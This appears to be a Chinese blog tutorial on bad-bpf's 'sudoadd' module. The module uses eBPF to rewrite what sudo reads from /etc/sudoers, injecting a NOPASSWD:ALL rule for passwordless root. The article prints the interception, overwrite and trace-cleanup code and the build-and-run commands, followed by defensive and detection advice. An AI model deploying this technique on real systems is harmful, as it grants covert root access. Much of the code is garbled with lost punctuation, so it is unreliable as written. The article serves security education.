多彩编程 多彩编程MZPH · CODE BLOG
ARTICLE DETAIL

文章详情

深耕前端与后端开发技术的一线实战笔记与踩坑复盘。

Sudo-Add权限提升详解:eBPF篡改/etc/sudoers文件实现无密码root

Sudo-Add权限提升详解:eBPF篡改/etc/sudoers文件实现无密码root Sudo-Add权限提升详解eBPF篡改/etc/sudoers文件实现无密码root【免费下载链接】bad-bpfA collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29项目地址: https://gitcode.com/gh_mirrors/ba/bad-bpf在现代Linux系统安全中eBPF技术常被用于性能分析和系统监控但也可能被恶意利用。本文将深入解析bad-bpf项目中的sudoadd模块如何通过eBPF技术篡改/etc/sudoers文件实现无密码获取root权限帮助安全从业者了解这一攻击原理并增强防御能力。什么是eBPF权限提升攻击eBPFExtended Berkeley Packet Filter是一种运行在内核空间的虚拟机技术允许用户编写自定义程序在内核中执行。当被恶意利用时攻击者可通过eBPF程序拦截系统调用、修改关键文件内容从而绕过传统安全机制实现权限提升。sudoadd正是利用这一特性通过篡改sudo命令读取的/etc/sudoers文件内容达到无密码获取root权限的目的。sudoadd攻击原理深度剖析核心实现机制sudoadd通过两个关键文件实现攻击用户态程序sudoadd.c负责配置攻击参数并加载eBPF程序内核态程序sudoadd.bpf.c实现对sudo命令的拦截和文件内容篡改攻击流程主要分为三个阶段1. 目标进程识别与过滤eBPF程序通过跟踪openat系统调用识别sudo进程打开/etc/sudoers文件的操作// 检查进程是否为sudo const int sudo_len 5; const char *sudo sudo; for (int i 0; i sudo_len; i) { if (comm[i] ! sudo[i]) { return 0; } } // 检查是否正在打开/etc/sudoers文件 const int sudoers_len 13; const char *sudoers /etc/sudoers; char filename[sudoers_len]; bpf_probe_read_user(filename, sudoers_len, (char*)ctx-args[1]);2. 文件内容拦截与篡改当sudo进程读取/etc/sudoers文件时eBPF程序拦截read系统调用将文件内容替换为预设的权限配置// 构造sudoers配置 payload sprintf(skel-rodata-payload, %s ALL(ALL:ALL) NOPASSWD:ALL #, env.username); skel-rodata-payload_len strlen(skel-rodata-payload); // 覆盖文件内容 for (unsigned int i 0; i max_payload_len; i) { if (i payload_len) { local_buff[i] #; // 注释掉原有内容 } else { local_buff[i] payload[i]; // 写入新配置 } } bpf_probe_write_user((void*)buff_addr, local_buff, max_payload_len);3. 清理与隐蔽攻击完成后eBPF程序通过跟踪close系统调用清理临时数据避免留下痕迹// 关闭文件时清理映射表 bpf_map_delete_elem(map_fds, pid_tgid); bpf_map_delete_elem(map_buff_addrs, pid_tgid);攻击实施步骤环境准备克隆项目代码库git clone https://gitcode.com/gh_mirrors/ba/bad-bpf cd bad-bpf/src编译项目make sudoadd执行攻击使用以下命令启动攻击程序指定目标用户./sudoadd -u [目标用户名]此时当目标用户执行sudo命令时将无需输入密码直接获得root权限$ sudo -i # 无需密码直接进入root shell防御与检测方法系统层面防御限制eBPF权限通过内核参数kernel.unprivileged_bpf_disabled1禁用非特权用户的eBPF功能文件完整性监控使用auditd监控/etc/sudoers文件的访问和修改最小权限原则避免给普通用户授予CAP_BPF等特权检测技术监控异常系统调用检测sudo进程打开/etc/sudoers文件时的异常读操作eBPF程序审计定期检查系统中加载的eBPF程序关注可疑的跟踪点和系统调用拦截日志分析分析sudo日志中出现的无密码成功授权记录总结与安全建议sudoadd展示了eBPF技术被恶意利用的潜在风险这种攻击方式具有隐蔽性高、难以检测的特点。安全从业者应加强对eBPF技术的安全管控定期审计系统中的eBPF程序部署文件完整性监控和异常行为检测遵循最小权限原则配置系统通过本文的分析希望读者能深入理解eBPF权限提升攻击的原理并采取有效的防御措施保护系统安全。项目中更多eBPF安全案例可参考src/目录下的其他模块实现。【免费下载链接】bad-bpfA collection of eBPF programs demonstrating bad behavior, presented at DEF CON 29项目地址: https://gitcode.com/gh_mirrors/ba/bad-bpf创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考
返回列表